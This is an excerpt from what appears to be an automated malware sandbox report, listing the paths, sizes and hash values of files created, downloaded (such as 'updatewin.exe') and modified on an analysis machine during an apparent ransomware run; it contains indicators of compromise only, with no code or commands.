SHA1: 096ba45c46658cb782938bf35c5100cd970a317b
SHA256: b453ee433b55634aa6af66f9be3e3e543da0e50b5faba30d7de0ce47c6697a79
SSDeep: 1536:XJIO3oXTu9VuLXiXqe0cgKeYaJlvsjA3D:XJqXiTu+d0cgPRsj6D
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\NxEBIllQ9 cZLQxHAnf.xlsx 71.89 KB MD5: e0c40cf202a5945e15d37209b8bea4f2
SHA1: ced83af7244b489a226add766c3f855d491c0786
SHA256: eb4c378bd92752babc34d1cb13ff0b0d1d99d72cdc3bad56265ba7f025726ca9
SSDeep: 1536:2m6hvjHSBO829pVTmNn+z6Rff7SRikHI84PhK+pdp/lTAtPzF:T8jHZlvTmZ+ETYHIfn3p/cLF
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\Rpss_8PAcreSznq0jw9\ypdm7CG6ozW8_F3RQh.pps 49.35 KB MD5: f9104c315a5a5d81882c8abe10b709ec
SHA1: 45fcb42567d602306cf91b112c6829a0c3d0eca0
SHA256: 3c8fc56e177e1fd84731af14fee2f5dcf4b604794b42f17ed4d64b80368efb6c
SSDeep: 1536:gAJTGNScIEXz2ePNhVtSVDqjsx6Li9/PC6T:5JT4Scpz/PVtSVgi93VT
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\1m7527vbdeC.gif 31.58 KB MD5: 5418d00984b392759933d37dfb9eca1a
SHA1: 23e5853d96c966f6a05e96f2a7cbe075305e27a8
SHA256: 35c5aefbff49a055f906e44165c0d04221c2cf51f0e2d13162d506a953431355
SSDeep: 768:kYPBAt5sI7ArsVfDKOnfnsszHqTi3+M2gFYZ:kft5sI7LLbLIrMYZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\cSaVaB0sUlp.gif 39.49 KB MD5: add4a6fd45265ee9b1f4e0438d187ff5
SHA1: 560db52267f1a3c42c96a4bbc6b2e30c9027ae59
SHA256: 2cb25ba732df00db6d9eae720c6d6b511e3e7955efa13dbaa301d013e1adbf01
SSDeep: 768:dqi/d1ROwHkZZ4/Nt8pF9zdQn8pdWH0hSfNrfMhUFNRlToSOrqGiab7OD4yM:dV1ROokWPez9/WU4pSuw92GSbM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\EWTals.png 5.45 KB MD5: 50d59d0e9fcad45acbd8d22ff92538a2
SHA1: 24d970e51211c1b40f1a33297f55b4549dc87980
SHA256: 686fe5550098c2c12edebbe51aa8d9bb1c32c8303ff7d37d372190cfeca8328c
SSDeep: 96:VZIo6UcRFpShGQrO9Sp0HRuXKg9ThnWr8c6jE5tA3uRdH84Rq+6jS5N:VZIh55/6iSfdhnjIWe9b62T
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\TK27wDdNd6Xfl 2b_k_.gif 75.83 KB MD5: c1f3525766c1eb30cd5adfe3b9130536
SHA1: 69c9c26812d952d737afdec4a392c45cc5c6e181
SHA256: fc3368dace7f7f68599b86475e1e7163c3000d18a8724f8f2ee60df78bdad94b
SSDeep: 1536:DBXNBAB6DfAr2EV28pxLGVblYSAjBC7IKVFnKWiErkwFoLjOM7sLbNyW:p3DfO2EV2elibRUBCsKVB1iEbq5W
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\gJs687PmdwJ\Wqelj SIFg-o4.png 19.23 KB MD5: b60b5afc39c6460ad15f4e1c20a32abc
SHA1: a553047b87cc166a4b2a9cc2cbf896a3475a7b32
SHA256: 393daa1283c60ae64f4c3e4888ab28808d627dcc48b3d92233212c21333816cb
SSDeep: 384:VCp06afKXdFeZ2zerxDaKvyQqhgtpJPZcGg4TU2pnkCJn/LdLGsnWO5W71PomSZj:VCi6uWuDdShg3vXgZ2Pd/hLfnJW7lODp
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\NtnCGgs\-3tBc\p-qIG.doc 37.24 KB MD5: 34e8400dfa2348c3bafa2a71a2409cb9
SHA1: 95ce0a9a664f8e12a59163bab72e5a006179b757
SHA256: c5861a09000ba5c9cddf5c6c2b4dbf68d5a388e17d2a6575a59d212cd81fab50
SSDeep: 768:FiBQSbQJnxQLZViPUIuAJU9KfkCdZ9CIXk0wHaGxVilBdX4:FcQSbAnOLZscIpU9KbdLPLwbfiC
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\B2EsvKtcKir28U.mkv 70.42 KB MD5: a4fb436cca72708e1857e1d841ed5e0d
SHA1: 19d78befc8eb0166e5307fd2df01aa49e940f68e
SHA256: ca305d256888973a210725a4d17cacafcafda64404b479a94edbd19793388cfb
SSDeep: 1536:eBRVlXmMJEDsXJKyedz6V9Q0R9lpbN8I8MoNuZukXD:eB3lWYEcJny+Q0R9zNgMoNuvXD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\Jf 8.avi 53.11 KB MD5: 70f48e2798e73cd97d298047e558f293
SHA1: 561eb2878f5a6eea52f17b06425f22c2bec4c573
SHA256: f5bad3b641a09a63655ae775be2d99b2b2fd3ea41c5cf92581d4ebaa4e9bb9c4
SSDeep: 1536:ei50fQcsej8nB7YsoHX/p43tWPne7rsq8DMia70un:ei50VP8nFYXHX/gWPyWaV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\WTnDwa-D4KBHQUw.mkv 55.95 KB MD5: 7be30b8350409eb6de6eb495e5c9d991
SHA1: 11b5f4c601981f3b90870e8e4f484d40ae18902e
SHA256: 3cb0b35f5fa681bce496ed30ef79c01afc7f97ae1511032ed828d3f16d5507e7
SSDeep: 1536:5TYsHAurOh8lJytwK1lk5TbYznbnIMrbtpN3p:KsHfCiOtwK1lk5TO0Mrb7NZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat 32.08 KB MD5: 2cc8f2785c04cbcb7ef69509145697b1
SHA1: 6edc2fedfc8dc9c233501b2bf5b3e52ce7ca0c09
SHA256: 02716ed5a14314ce70ddd73a4e9bee9cdbb5d37c2827cdab0eab02b26dafbd0c
SSDeep: 768:ONbJmwfjcwgu3ZEEgSnRj6T7hOhpVwLURs3S2ip6EQ9c9kkaeB:ONtmwfHLicj6T7hO3wURIuQISG
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab 568.17 KB MD5: f460821c3471f984d66d79f7cba1fc7c
SHA1: 2ef4d82abd9410c35821121f551ed48f45b06d70
SHA256: a407a24ac88cbd0968c390d8a7ddac78b9aaf528fbc59eece8e89f9a55bbd159
SSDeep: 12288:mmkeVqwDAjfMl6jY4hyMPezVNK9TcS5RyjDUI6Eh/MOhT/:FDAjk/MPgyTx6jDUbE2IT
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab 24.17 MB MD5: 9db44901600b9cf38610af6673b69a99
SHA1: 500ef277d27034ec9cedc606808b0aea2a2c97d7
SHA256: 42dbd6070541a7ca8a605e98e13192cc887a6f6b14c5cb8cb976194da89c0cba
SSDeep: 196608:JWdNm7l//upum9uxpfp4uZ8q7zEqaZswqLhQTcvlj9/z2H7DLKH8:Tl//upum9QtEqaeqc3/iH3mH8
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi 885.58 KB MD5: a6bab5f48e2003b8fd4888abe8ed859f
SHA1: 4643e1a03259553c6d046c4dbde6cf4d31168c5d
SHA256: 81e17a5f0674ddba1446f80085a7b97edc7dd29a5b02234e7f995406cefc1900
SSDeep: 6144:+5E74HldkIMU+pHA5BktGnGj2QELvMYI2q3ksedyPs3ETGpyIQEkmt3PNXMRiWRJ:+5E7i6IMU+GDo4nikseAPsJpfjt3PEX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\dH-l6u.avi 93.62 KB MD5: 2458a128ee9f8530f6481f860afc365b
SHA1: 14905b242cefe967dc4358be88c2037d7474f8e4
SHA256: 1ebcb1647dd3e81cfcdbaf36bbf4e9ac618f2ef788f4425aec3017514d08d7dd
SSDeep: 1536:craAoLA8vfhOXonhf4I/LCrJYT9ckOoUlDu3jS3JPqQrlpJApFG3VH2HJQRuWt06:c5oLA8qoJ4SCrJ+9cpi8lfpJiFMzRfIw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\ziyBrxM6Ba3SqMjEYO.avi 10.26 KB MD5: 2019f38fce8c60d7ebc8f5a1b12c4158
SHA1: 748b85b4b38e29664fcb3e0320811d3ce5a86fb4
SHA256: 213e9559e79ac806d9ff1a6b76f7ad306d5062018d5522bba1a804f3f018d6c2
SSDeep: 192:tZ96xCRZG7a1OvlRly7vau7y30j/tL6zjyT7c72rdBDZGKHfD0AEsD:X0cqac9RlICu23g/ouT7OedBDZGAD0AF
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\-upHLx loeeu-TB.mkv 23.89 KB MD5: a8f8d5d0035cf9360ee5cfd1ff14a88f
SHA1: 3e88319a34b55fa769834027f3d6a5d4f12e7f25
SHA256: 1e193d742b0526889cb6cda6a8cb9df18e6c2a8c0c381a47e1d56f17b844c998
SSDeep: 384:QP1nYBUyqY1vZqGFp9BtplszJDUQ4HG9G0BQISjIqqk3mKhKnMOHh0avm/uCCql7:I1nYBUyqyBXplWh9M04Iq73FKxJuKql7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\f NqUp5_D7sMGe.flv 10.88 KB MD5: 1612bb634c3873cf0d8b08f6fcfc7d19
SHA1: baf88c0250842293a018b2ef7fbc2c3d234e74be
SHA256: e99d9c905e851cb7c1e3b4708acd1bcb5253e4c8e3c3dde4107ef325a4584e57
SSDeep: 192:Kq8LkyUACPwTYulzQ/sQG297gr7jla85XYehYDKfuoWiel/I09YgLoFU/JSX:KqOUJPwsu+/sQG2B85IZDKxBYoyIX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\tEhXK0.mp4 74.60 KB MD5: 2273cfffe5111241ad592dcaac13822b
SHA1: 524a38ecd2083abe3f1f0cb363565617dc30263f
SHA256: a40b8b87ea8a7341197a773a8e4c960fe68b19c067679efe7bd15eddf81e20a5
SSDeep: 1536:bVXvPL8E4QuGmDBjBl7j5QELPnz0u7DFQc/LYURzdUmLamgQDE:bV/TkjD9fn5LQrcjYUgmmkDE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\yboEd.avi 83.09 KB MD5: ec3224719642c445af786fced2ca8607
SHA1: 6e9585a17c4fcbaf654daede5f5b5524462f8d51
SHA256: 491947f9139265434514c314f66e84146a6828fcc6bc31c3eff6cb4081e7b5c9
SSDeep: 1536:GUVCZSc4z3DOqLWvwmTVI1fkCHBoVUBvQDHebs+X4iE3M1Evzq3:hCZSpOqLF2CHBoVEOHebs+XmMyG3
False
C:\SystemID\PersonalID.txt 42 bytes MD5: 8c03e6fd7ceeadbf34e6b1a825406e26
SHA1: dadaafe7bd479df2b69e123d272331d729b0853e
SHA256: 0db62dbad66279e04e33aa7b9f464f8aaf9b786bd4c7753463ff5ac4303629d6
SSDeep: 3:F0S5o5dwRkJSMG3EPhbyk9n:95udkqSMeEPh9n
False
C:\Boot\BCD.LOG1.cezor 0 bytes MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep: 3::
False
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe 238.00 KB MD5: 94a06753e6e820fdeae656052d53d9ab
SHA1: 56bd572c1f05686f8f8a8fa733d4162f5d95f96b
SHA256: 63aa3807b3ccb49610bc17d89a8109767320cc96afe95fbd4edd8b7e9ad8a05e
SSDeep: 3072:9pg2NL1X0t9oJidRLbjjRReSI7pJArvPb/OfOFlAcvyZ1z2F9kgye9FyLxaWq:8gJa5Hb/OmFlA4yZM9/NUQP
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Boot\BOOTSTAT.DAT 64.08 KB MD5: b7f9c6136873478973c188e420cc1b23
SHA1: d4bdb184570e803d8565d8512d5ff02e5fd179eb
SHA256: 031cdde98a4025a314d7cc111b7b4c9d07739d938eccd2ad2499645caf53de0f
SSDeep: 1536:6Xix0LB4LbDIXVJZI4osF+UhRkjuSWZAuuMt:KE094LfKLi4oA+LuSWZ9t
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact 1.23 KB MD5: b3234c811c802bc2e2af4208f8fda25c
SHA1: bdd1452e79e86c6cceb69f0c89715e504ed4aba3
SHA256: 80e5a5225a7a5a533b9a40f13b536200c852fee6b808d30d3d6d9c6d6f052364
SSDeep: 24:2FzBPJU42yTuix1ajwQbNbhuGzY5hXR8IeoqfaRyR5wASesbD:2FzBPJhTxIjh/zUhB8Ierfge5wASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact 66.86 KB MD5: 29b08fef13dbdec7044276de3f6f3e05
SHA1: 11d12976faa561a82e6609ca3ed736567403fba6
SHA256: beffe810d67a97b66c79ba95d20bb349e08a3cf68d6cd252c9118c3e17ab88ac
SSDeep: 1536:NRevfh5KSk7cstpjO/zX7lVx7NH0PTfSXvCwhjAf2PS4BNxJ:bevf2VpjO7pVfH0PP6jmdeXJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact 1.22 KB MD5: 415a095dde3dbefaab0fd359dc045f80
SHA1: 4ce38f8637625395cce5abf566eec1da9768aa9b
SHA256: b5072325100a6b858806ff64965bff6e4db5171ae3bd4a1fc213bb74f487f10a
SSDeep: 24:2FzBPJU42yTuI2Lwuk2y/sv9eKoBAczIAt1lLehMY4ZRmdE+sASesbD:2FzBPJhv2Lh4+U5khMfYdE+sASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact 1.22 KB MD5: 91fe2ab90204014ecd4b6f005ccf2a58
SHA1: 473b1179927be2af33b2e0fc9d208d23e0190c40
SHA256: 789f317a309bcf8e8a90f1032b76e8872f0f65813b7d3f37bee862a792254514
SSDeep: 24:2FzBPJU42yTuMIm62i+wvabNbhuGzY5hI+RU3hgchDCsjVg7CRFASesbD:2FzBPJh2mPXMg/zUhI+RfzwVmUASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact 1.22 KB MD5: ca2c649bc081c88505222ab7ab5126c8
SHA1: dcf7b8fe8fb402ef34eb2e8407fa7958bc8542ef
SHA256: c8e369657c8c8683fe6f666fb16f224a29e857785bda97a028348f35c74961e6
SSDeep: 24:2FzBPJU42yTuaOwP1CLXtu31rVHtDumOBX1FpuVx79rlUASesbD:2FzBPJhWHc1rlYme1PUlyASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a 18.26 KB MD5: cba194e5860deb41a1f33b6bd61a64fc
SHA1: 76d4244387fa4cd6b66aab5f75255858ae12c6a1
SHA256: fd52271bae256f7833089ed8a7d043a88c2286c0ba49aca8b441864f2bcf3ab6
SSDeep: 384:Bs391RI8LJnvGtIn48kLOCesmnA1XF5NqpfFqk0/VMCpHqOoK+9Z2vYUsfXw:etB7yOM91X70CtzobHPw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp 84.29 KB MD5: 051a8ed133ec583430178a138ddc42e8
SHA1: 6cdac8f026fa9804330dfae5c0c4f02b518bad95
SHA256: 0937041277a6f50a733e977e726f08f4d9b446d179a066e5c56c9e19be1d8c39
SSDeep: 1536:5t+4PUde+0rfRk3EC1+NCDxPAeQy+cM3q0XtLN4QOfRJ2X0rHUBFloK:+bdhMJkUCAmxYexDMH9KQoRJpjm/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp 19.30 KB MD5: b30c317f89bbbce1c84967ded4102ca5
SHA1: b42ab67124911da41a9a9802d734cb57919fd41e
SHA256: 071d46b1a9ad6060ee27e8189c16eeb01213067e65bd46b0143bf94fd73f2de8
SSDeep: 384:cGOaiPYu9g1tX8t8uxwV83QGw3guk6gvyihdPyQW:cJCy+V83/wQx6QvHW
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav 33.08 KB MD5: 745f9fcdfc2ace4cbb458c8135bfaac3
SHA1: ea579cdde98e9d21d6d8586e7dd5ac34b113ba20
SHA256: f9886efd82d884effbb99a8b84b98847707fdd129070e82654cee8bf95dca2bd
SSDeep: 768:yTG4vZGVyYU/yQeM+FesSeZkURr+/7Hw1p5e4rnyvdB:yTxAVyYl1esCUROHYzUdB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 15.54 KB MD5: 949627b39237805165976f98915bc827
SHA1: 5ca905a14f152546e6aeeff8e6fddc0a153e3400
SHA256: b39843dd0540b050c4f25530dba3e2f6b19f0ffe8f1f3a4adc347fab94cb15b8
SSDeep: 384:LOkhroj8V0BnhBKM2xSwqwzXetnqIw234q9VbaJbunn12m:iGkdg/qXFqIwMx4J6nwm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps 76.31 KB MD5: f6211b69a61d788697b1a7d7170c5c53
SHA1: fbcd5887a4299c5ec522ee914d4c0b700dd9c844
SHA256: c64d5d943bc2a34ed6c52098b991f56211a7f6ad1a138503b8f2fe876a5a8f4d
SSDeep: 1536:E/qStkJhXU8Sfx3zKgD8+vts4LxbjnoV4rzFOXkz3bGJv6bwBVK:oqSG9S53z/vt/LN06zVz3wHVK
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp 89.04 KB MD5: ddbe8e83f612837148cd81761ab54d0a
SHA1: 913a8da72e204bdac48b5a1dc9359097f122f885
SHA256: 5751d8dc329c17ef8fbda0910f8ecc2e4857e3e705342f3f759778341bb7ea2a
SSDeep: 1536:8L/FaboujQBrwGk/On6LNdooYaB/a5arIZHlK8G8:ccolaGkkooPag5vZHFG8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf 77.05 KB MD5: d84213966c09a8a0908f2c0e25ff5611
SHA1: 9d8bf2bec90238cb3552148a30c1f94f98275581
SHA256: 040fdc5ec0c336f4b60d59d509bae40d7b4d683c7e9d69ba00af8517e96c3781
SSDeep: 1536:7/BQtPO7TAGSLzYJtHPyQxDo2+8LOBmkDCzzVSYeYvzmHT/eT+0FNw+bM:7ZX7TEL0JxyQho2+AOBmkDMJvzmTRs+3
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 16.45 KB MD5: dc45a0f543f8c7a8876746b5c38bcfd5
SHA1: d4514daeed66c3d3787cdb39fcc80e0a3dfd1884
SHA256: eb85101a119dc1682fa25f31e4daf0415f49c68dea1898ecd39d4110454a80b6
SSDeep: 384:y+nK99ib1rXTBDZkT8hIogkxSPFj4NS8aVlGHe3f56XVqg:y+nK9Mbdv+SDg28p4Q8aVE+vwlt
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 82.00 KB MD5: 608a336b0f3cc813baae25ab46142920
SHA1: a66614bbd2ec6bc2af2a667e2392dabf2ca40e6f
SHA256: 168dc09a88d99b9910fe68669792634baad287e3b894ccf174ac8101b344f654
SSDeep: 1536:/uS56lsCliaJku3/nJG0qJ5TIILFQbWh8qF5ifeKbk2L/j69MJz83xpB6:K22X5vnJKJ5MILJEeCk2LuWd8t6
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVeSXOWXfi_KaHM6.swf 91.30 KB MD5: fae0bb4268e7ff66a8395054a5f2167a
SHA1: cb55af92cf54ce09ed4c9c284c85f3b47c2a092f
SHA256: 4bee85e6c3469bcc5ae522ec3595aba7622f3213e8b88769ef6996d5408a8e4f
SSDeep: 1536:5Ki4M0awcsuqGFXAneXoEmkocA/rjLepEW24Y77PalIGVpA88U5zw2nbUm:ciT0aDqM3XdirjLPWrO7P0IMi88882nJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVgxMcsEjpWpZrN.jpg 22.86 KB MD5: e9d3dcc86f7116f6b6cf1325d69e0e92
SHA1: 36eb4060e5d974608ef64d4196484b7cc02fe711
SHA256: 384b039e84f956c8090bd6fe20129f71cab80bfd3d239dce6b6872ed59874a21
SSDeep: 384:eetE3s8YdVF68BbqFcXs/NyLR5ILrYOXIscKFR5GVjbxY9Ae/JKUIW61h7F:eet2s8Y5BbqFm/gQOXMw4ZSVJj6r5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wjaMa6Mk-99x.gif 79.98 KB MD5: 9b0f4fa12b7c59db64edb8f51917e4f4
SHA1: 012ba476fb26a6641fcfcbea2f36165c45f76396
SHA256: 20a2c6edf857105a72e0c204dade8590559c1bc1bbd1d0e2364f242b5f586095
SSDeep: 1536:45EKgNo6YUs31XbrCd5bgZP840h/HX/jLmMOZJcPp:eEW6YrCdZgl8p93OMOZJ2p
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xk2XWRW.flv 38.32 KB MD5: 1ccfb8c19cf0f38ae18758d3c5e31f45
SHA1: 7809a612326cb04e1cdfe83c0d41d4e56103ce3c
SHA256: c78e298432f37dfe7ff741bd2bba0c5062d86983d74f3d37c31e8a7f43d8aca1
SSDeep: 768:D0yjAwgEiEkPn5wI9pJUS7NoMVJyTalIQFiWXkbqD+ksd+73r:DbMwgnE25FJUSZoefFiOiqyHdA3r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3kKQ7nGkbpOOq-1 5zRt.pptx 97.94 KB MD5: 72de16913661fc565f26c22110b4a8d3
SHA1: d91a31bf71fac90878ec3a74ec4e73999085cac7
SHA256: 43ae7fd4f1f0d697f3b483a9bbe30060481e4a353d340da26a85a33a72245633
SSDeep: 3072:/H3/QPC9WEX5SR8AqfZ0E1SAF7Lcw7QtsyzQPKU://QwWQoFYGE1SG7Lcw7QtvzlU
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45LEiyxnf Plrmb.docx 92.81 KB MD5: a3f627f5d60e0c09f3d3109b5ffa450f
SHA1: 873f705fc40c2c339c178fa881e9b7e407a2d8e6
SHA256: 799f9a5bfd1b912efb84062764a18cf768d65d12a623d7a70c405a23880a7022
SSDeep: 1536:RTnBz9iY7p+HiyX1lDgrabrTrzn+PHNAZ3H4AZ4C9DaEmULH/sY0E5:BxX69X1GrabXrzeHA3YAUEmULfl0E5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5Jnu XQUnVKH6.xlsx 90.28 KB MD5: 7bf670b3c26cf86a62967465d7fedcb2
SHA1: 530b7f991a39550b8694c280ebbf2fcf4a25f188
SHA256: 58aaa39d954ddb703a537cef74f446a7c3c40d0692f2bc4288f0a5deee5bd829
SSDeep: 1536:tuUKx7arqP1hKLIGCYVac5ZiJesbuufe/ETQlqdNwYYCQl0+phCMS82+Wuy:tudGVbCYVayiJesrfeMTQlqdN7e08o8U
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5W-053pafC.pps 13.58 KB MD5: 941572c923a2abd5876a45b3f2a87de2
SHA1: ef46bd15d787d62ba9c6ae9845d8b480f28e63ca
SHA256: 3ccc757ac2168a2ec005924f3f4aab0c59876bcb8738447a43492962fddc0a58
SSDeep: 384:JQMkU5uM6USO70RWkK7cjXbh6t7zUYpG6ibd2Yid:+LUwMYO70RFK7MMSQGrUV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\AGokm2hLuNsPkZ.pptx 52.20 KB MD5: fefdd4ab551c28f9d044fd35a820365c
SHA1: 05eacf377e8da91a7b0f622d71d4e682e4a7d656
SHA256: 34767970b4b43633bc889cee53604795ed200be4064f89aa0799342f00ba0533
SSDeep: 768:QyITDzUFOMeFX9N4XgSG3hLLE70FBz1cymT2ukH0ztoxqfg0/rrDxu3bhYVdv2b:QRzUqFX9xfLZFvukHQYmrrUFqv2b
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\BUziw_klSFTDwvC1Vm.pptx 88.17 KB MD5: 46f507e51b2f0cf3e39f440dfa65b427
SHA1: 40f0c05e890eaa85211284c62ec1e434cb3cbced
SHA256: 3a657c34b2da90e951b1e70c8d203f885bdee71999bc649271cea94f82dad606
SSDeep: 1536:Wt90oCXsb1RvjR/wSb6+00VZpevour5fqYW124Tl00FnsCgK7Laz:WwRXMbtICqAOvDd3s24T+anjP+
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dtk7xvzoVk_gCAUAkb.xlsx 94.02 KB MD5: 4a83f154e1d9f834ae6e13e53b504471
SHA1: 14fc80a91e3f03e60368673c12b89349b1675c4d
SHA256: 57355da81211d0636ff5089c09b37877eb3f4ffd39df28c92dbadee6f9897929
SSDeep: 1536:LIplzf9Xv47KdKGjmHei+o0uwGTcmCam91UVnUka99Seb5yUpniZ+qm25xn9:LI3L9wSo2oIGAmbm3XNiZy2F
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EDFXHniYi.docx 87.48 KB MD5: 192283640596d5ec53efccbb0faf25c8
SHA1: 8559dbf48ce2aec87b68924fe9a52f435b35be16
SHA256: 99a42c6aee10290b77443b862a7ac69015e2c12089c1f002f365b410b3f5ee9e
SSDeep: 1536:h8xwvaMc4tRdOKvPxw9uhEAmV+d8L3E4r0qLRwC9M0d52PfoxSyaEd12cGT67Svg:+xQaadOKvJALVQgE44GRwCZ5YfoxSyX/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G-R5IPPjXNO2pufW-w.pptx 41.87 KB MD5: 3f3cce4f7217310932b96fbbe2216cb1
SHA1: 59c609d27b49737476b16fb323ac237cdef952e8
SHA256: 07a57f42c4c0e1cdb35908c733efbf79eaefd0083ff8cb93504c6acf0b2566a4
SSDeep: 768:WK4Kh0zk4GMR9aIUrgCOnOzM28humplMBmtAEL1UKdsXhNZQ/VRumuf:WK6ksR9WZnWMLOsXrZjj
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kbQLv1HzRjuGX8_0 ow.pptx 62.54 KB MD5: b3bb349fe4ba7fa2e7e13c5a4da23edd
SHA1: 9aa6e1dec713a188b4acdd50cab1ddbd50ab1318
SHA256: 2d98e61e9c187cf215e6a460bcd896401cbe71e76e87bdbe9485547169f259dc
SSDeep: 1536:ZnbZU6FJcjR6iVMvwWTzC9P/Gb53y2CXrLR8:tbZU6LK8iVCwim/GE2yR8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\M0viuAr.pptx 21.62 KB MD5: f3899e4a9f9fd0f6a3605fc6bec058c6
SHA1: 6cef060e1080cce89445901e91f08db8a55dd13a
SHA256: 27ec59b65a03d18c6ad01d00690693e4a90a82b715f3f77f1cbfd954edd25591
